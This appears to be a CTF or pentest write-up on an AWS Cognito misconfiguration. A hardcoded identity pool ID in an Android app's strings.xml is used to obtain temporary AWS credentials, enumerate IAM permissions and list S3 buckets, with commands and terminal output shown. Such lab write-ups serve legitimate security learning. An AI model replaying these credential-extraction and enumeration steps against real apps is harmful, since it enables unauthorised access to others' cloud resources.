😘Vulnerability #7: AWS Cognito Misconfiguration

It’s not very uncommon that android apps nowadays use cloud services - and not very uncommon either that developers sometimes hardcode potentially sensitive API keys into the resources of the app. While browsing through strings.xml, we found the following key:

<string name="aws_Identity_pool_ID">us-east-1:7e9426f7-42af-4717-8689-00a9a4b65c1c</string>

After a bit of researching, I found out the following documentation for AWS Cognito Identity Pools which are supposedly a means to provide temporary AWS credentials for unauthenticated users/guests.

If you ever find a suspicious API key in some bug bounty program or pentest, try to refer https://github.com/streaak/keyhacks in checking if the “leaked” key has some potential security issues.

Using the mentioned keyhacks repo, I tried to read the part regarding AWS and tried to install awscli using the following command:

sudo apt-get install awscli

To test this vulnerability, I followed used the following writeup as a reference: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

First step that we need to do is to extract AWS credentials (access_key, secret_key, session_token) from the identity-pool:

aws cognito-identity get-id --identity-pool-id us-east-1:7e9426f7-42af-4717-8689-00a9a4b65c1c --region us-east-1 
aws cognito-identity get-credentials-for-identity --identity-id <identity-id-from-previous-command> --region us-east-1

Afterwhich, we’ll use the following script (https://github.com/andresriancho/enumerate-iam) to enumerate permissions with the credentials that we have.

python3 enumerate-iam.py --access-key <ACCESS-KEY-ID> --secret-key <SECRET-KEY-ID> --session-token <SESSION-TOKEN-VALUE>

An interesting permission that we have is that we can list the s3 buckets. For it to work, we need to configure our credentials (I’m using new creds here, I may have messed something up earlier):

We see two buckets, now let’s see what they contain:

┌──(ctfvm㉿ctfvm)-[~/Desktop/test/enumerate-iam]
└─$ aws s3 ls                                                                                                                        
2020-11-15 12:31:10 elasticbeanstalk-us-west-2-094222047775
2022-03-22 13:05:02 telegram00lasagnahowto
                                                                                                                                                                                 
┌──(ctfvm㉿ctfvm)-[~/Desktop/test/enumerate-iam]
└─$ aws s3 ls s3://telegram00lasagnahowto --recursive
2022-03-22 13:07:00       1949 Misconfiguration of Misconfiguration task lol - https://t.me/lasagnahowto , https://uvicorn.github.io <- writeup here
                                                                                                                                                                                 
┌──(ctfvm㉿ctfvm)-[~/Desktop/test/enumerate-iam]
└─$ aws s3 ls s3://elasticbeanstalk-us-west-2-094222047775 --recursive
2022-03-22 13:06:59       1949 Misconfiguration of Misconfiguration task lol - https://t.me/lasagnahowto , https://uvicorn.github.io <- writeup here

Looks like some other player has left nothing for us lmao. To summarize the poc:

1. Extract AWS credentials (access_key, secret_key and session_token ) from the identity pool;

2. Enumerate permissions/roles for the credentials that you have;

3. Privesc by abusing permissions.